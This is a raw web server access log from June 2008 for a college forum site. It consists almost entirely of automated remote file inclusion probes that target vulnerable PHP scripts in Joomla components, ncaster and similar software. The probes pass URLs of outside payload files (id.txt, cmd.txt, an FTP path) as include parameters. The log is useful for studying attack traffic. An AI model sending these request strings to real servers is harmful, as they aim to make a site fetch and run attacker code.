219.94.133.251 - - [01/Jun/2008:17:00:20 -0700] "GET /logs/access_071224.log/errors.php?error=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
219.94.133.251 - - [01/Jun/2008:17:00:20 -0700] "GET /errors.php?error=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
219.94.133.251 - - [01/Jun/2008:17:00:20 -0700] "GET /logs/errors.php?error=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
62.140.19.142 - - [01/Jun/2008:17:01:07 -0700] "GET /logs/access_080128.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
62.140.19.142 - - [01/Jun/2008:17:01:07 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
62.140.19.142 - - [01/Jun/2008:17:01:08 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
217.153.141.220 - - [01/Jun/2008:17:01:13 -0700] "GET /logs/access_080225.log/admin/business_inc/saveserver.php?thisdir=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
70.87.13.42 - - [01/Jun/2008:17:01:27 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
70.87.13.42 - - [01/Jun/2008:17:01:28 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
200.229.199.197 - - [01/Jun/2008:17:01:36 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
200.229.199.197 - - [01/Jun/2008:17:01:37 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
200.229.199.197 - - [01/Jun/2008:17:01:37 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
200.229.199.197 - - [01/Jun/2008:17:01:41 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
200.229.199.197 - - [01/Jun/2008:17:01:41 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
200.229.199.197 - - [01/Jun/2008:17:01:42 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
200.229.199.197 - - [01/Jun/2008:17:01:56 -0700] "GET /logs/access_080121.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
74.222.17.2 - - [01/Jun/2008:17:01:57 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:17:01:58 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
74.222.17.2 - - [01/Jun/2008:17:01:58 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.collegiateforum.org"
200.229.199.197 - - [01/Jun/2008:17:01:58 -0700] "GET /logs/access_080121.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:17:01:58 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:17:01:58 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:17:01:59 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:17:01:59 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:17:01:59 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.230.21.32 - - [01/Jun/2008:17:01:59 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:17:01:59 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:17:02:00 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.230.21.32 - - [01/Jun/2008:17:02:00 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:17:02:00 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.230.21.32 - - [01/Jun/2008:17:02:00 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.230.21.32 - - [01/Jun/2008:17:02:06 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:17:02:10 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:17:02:11 -0700] "GET /logs/access_080128.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
87.230.21.32 - - [01/Jun/2008:17:02:11 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:17:02:11 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:17:02:11 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:17:02:11 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
87.230.21.32 - - [01/Jun/2008:17:02:12 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:17:02:12 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
66.226.64.33 - - [01/Jun/2008:17:02:28 -0700] "GET /logs/access_080121.log//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/tecra11/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
66.226.64.33 - - [01/Jun/2008:17:02:28 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/tecra11/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
66.226.64.33 - - [01/Jun/2008:17:02:28 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/tecra11/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
66.226.64.33 - - [01/Jun/2008:17:02:30 -0700] "GET /logs/access_080121.log//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/tecra11/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
66.226.64.33 - - [01/Jun/2008:17:02:30 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/tecra11/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
66.226.64.33 - - [01/Jun/2008:17:02:30 -0700] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/tecra11/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
216.14.127.59 - - [01/Jun/2008:17:02:41 -0700] "GET /logs/access.log//contenido/includes/include.recipients.group.subnav.php?cfg[path][contenido]=http://www.andygo.ru/cache/system/blid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
85.114.133.81 - - [01/Jun/2008:17:03:18 -0700] "GET /logs/access_080107.log//admin/index.php?o=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
85.114.133.81 - - [01/Jun/2008:17:03:18 -0700] "GET //admin/index.php?o=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
85.114.133.81 - - [01/Jun/2008:17:03:18 -0700] "GET /logs//admin/index.php?o=http://www.bapeda-jabar.go.id/UserFiles/Image/baru/splash.me.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.230.21.32 - - [01/Jun/2008:17:03:30 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.collegiateforum.org"
87.230.21.32 - - [01/Jun/2008:17:03:30 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.collegiateforum.org"
194.87.5.70 - - [01/Jun/2008:17:03:44 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
194.87.5.70 - - [01/Jun/2008:17:03:44 -0700] "GET /newspublish/include.php?path[docroot]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.21.104.25 - - [01/Jun/2008:17:03:49 -0700] "GET /logs/index.php?subp=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
200.21.104.25 - - [01/Jun/2008:17:03:54 -0700] "GET /index.php?subp=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
194.87.5.70 - - [01/Jun/2008:17:04:01 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
194.87.5.70 - - [01/Jun/2008:17:04:01 -0700] "GET /newspublish/include.php?path[docroot]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
210.17.246.29 - - [01/Jun/2008:17:04:47 -0700] "GET /logs/access_080324.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
210.17.246.29 - - [01/Jun/2008:17:04:48 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
210.17.246.29 - - [01/Jun/2008:17:04:49 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
200.229.199.197 - - [01/Jun/2008:17:04:57 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.collegiateforum.org"
200.229.199.197 - - [01/Jun/2008:17:04:57 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:17:05:14 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:17:05:14 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.collegiateforum.org"
66.90.73.127 - - [01/Jun/2008:17:05:24 -0700] "GET /logs/access_080107.log/?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
66.90.73.127 - - [01/Jun/2008:17:05:24 -0700] "GET /logs/access_080107.log/?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
66.90.73.127 - - [01/Jun/2008:17:05:24 -0700] "GET /logs/?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 200 4942 "-" "libwww-perl/5.805" "www.collegiateforum.org"
66.90.73.127 - - [01/Jun/2008:17:05:25 -0700] "GET /logs/?mosConfig_absolute_path=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 200 4942 "-" "libwww-perl/5.805" "www.collegiateforum.org"
66.226.64.33 - - [01/Jun/2008:17:05:25 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/tecra11/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
66.226.64.33 - - [01/Jun/2008:17:05:25 -0700] "GET //init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/tecra11/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:17:05:32 -0700] "GET /logs/access_080121.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
211.234.107.233 - - [01/Jun/2008:17:05:33 -0700] "GET /logs/access_080121.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
72.47.213.57 - - [01/Jun/2008:17:05:35 -0700] "GET /logs/access_080107.log//modules/xgallery/errors.php?error=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:17:06:13 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:17:06:13 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.collegiateforum.org"
217.153.141.220 - - [01/Jun/2008:17:06:56 -0700] "GET /logs/access_080331.log/newspublish/include.php?path[docroot]=http://maxbidder.com/uploaded/prc.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
87.230.21.32 - - [01/Jun/2008:17:07:06 -0700] "GET /logs/access_080121.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
87.230.21.32 - - [01/Jun/2008:17:07:06 -0700] "GET /logs/access_080121.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
74.53.229.194 - - [01/Jun/2008:17:07:40 -0700] "GET //inc/errors.php?error=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
74.53.229.194 - - [01/Jun/2008:17:07:40 -0700] "GET /logs//inc/errors.php?error=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:17:07:49 -0700] "GET /logs/access_080121.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:17:07:50 -0700] "GET /logs/access_080121.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:17:07:50 -0700] "GET /logs/access_080121.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.jef.at/50/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.collegiateforum.org"
74.222.17.2 - - [01/Jun/2008:17:07:51 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.collegiateforum.org"
74.222.17.2 - - [01/Jun/2008:17:07:51 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.collegiateforum.org"
119.110.98.132 - - [01/Jun/2008:17:07:53 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
119.110.98.132 - - [01/Jun/2008:17:07:54 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
119.110.98.132 - - [01/Jun/2008:17:07:55 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
83.168.226.100 - - [01/Jun/2008:17:08:19 -0700] "GET /logs//errors.php?error=http://www.germ2.com/www/z.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
70.88.226.121 - - [01/Jun/2008:17:08:23 -0700] "GET //admin/index.php?o=http://www.stjohnsconover.com/modules/MambWeather/templates/default/icons/cloud.png/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
119.110.98.132 - - [01/Jun/2008:17:08:42 -0700] "GET /logs/access_%3Cwbr%20/%3E080324.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
119.110.98.132 - - [01/Jun/2008:17:08:43 -0700] "GET /logs/access_%3Cwbr%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.collegiateforum.org"
210.17.246.29 - - [01/Jun/2008:17:09:20 -0700] "GET /logs/access_080204.log/components/com_performs/performs.php?mosConfig_absolute_path=http://funn.as.ro/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:17:09:26 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:17:09:29 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.collegiateforum.org"
62.140.19.142 - - [01/Jun/2008:17:09:29 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
62.140.19.142 - - [01/Jun/2008:17:09:29 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:17:10:12 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.collegiateforum.org"
202.29.32.2 - - [01/Jun/2008:17:10:13 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://usuarios.arnet.com.ar/adrikrasnow/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.collegiateforum.org"
65.160.234.98 - - [01/Jun/2008:17:10:21 -0700] "GET / HTTP/1.0" 200 918 "-" "com.frontleaf.util.HTTPClient" "www.collegiateforum.org"
72.47.213.57 - - [01/Jun/2008:17:11:19 -0700] "GET //load_lang.php?_SERWEB[serwebdir]=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
65.160.234.98 - - [01/Jun/2008:17:12:13 -0700] "GET / HTTP/1.0" 200 918 "-" "com.frontleaf.util.HTTPClient" "www.collegiateforum.org"
206.221.179.200 - - [01/Jun/2008:17:12:52 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
206.221.179.200 - - [01/Jun/2008:17:12:52 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://ieras.ru/tmp/aid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
62.140.19.142 - - [01/Jun/2008:17:13:38 -0700] "GET /logs/access_071224.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://singspiration.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.collegiateforum.org"
69.70.80.22 - - [01/Jun/2008:17:13:59 -0700] "GET /logs/access_071224.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
69.70.80.22 - - [01/Jun/2008:17:14:00 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
69.70.80.22 - - [01/Jun/2008:17:14:00 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.skyleague.net/contenido/logs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.collegiateforum.org"
70.88.226.121 - - [01/Jun/2008:17:14:18 -0700] "GET /logs/access_080107.log//admin/index.php?o=http://www.stjohnsconover.com/modules/MambWeather/templates/default/icons/cloud.png/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
70.88.226.121 - - [01/Jun/2008:17:14:18 -0700] "GET /logs//admin/index.php?o=http://www.stjohnsconover.com/modules/MambWeather/templates/default/icons/cloud.png/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
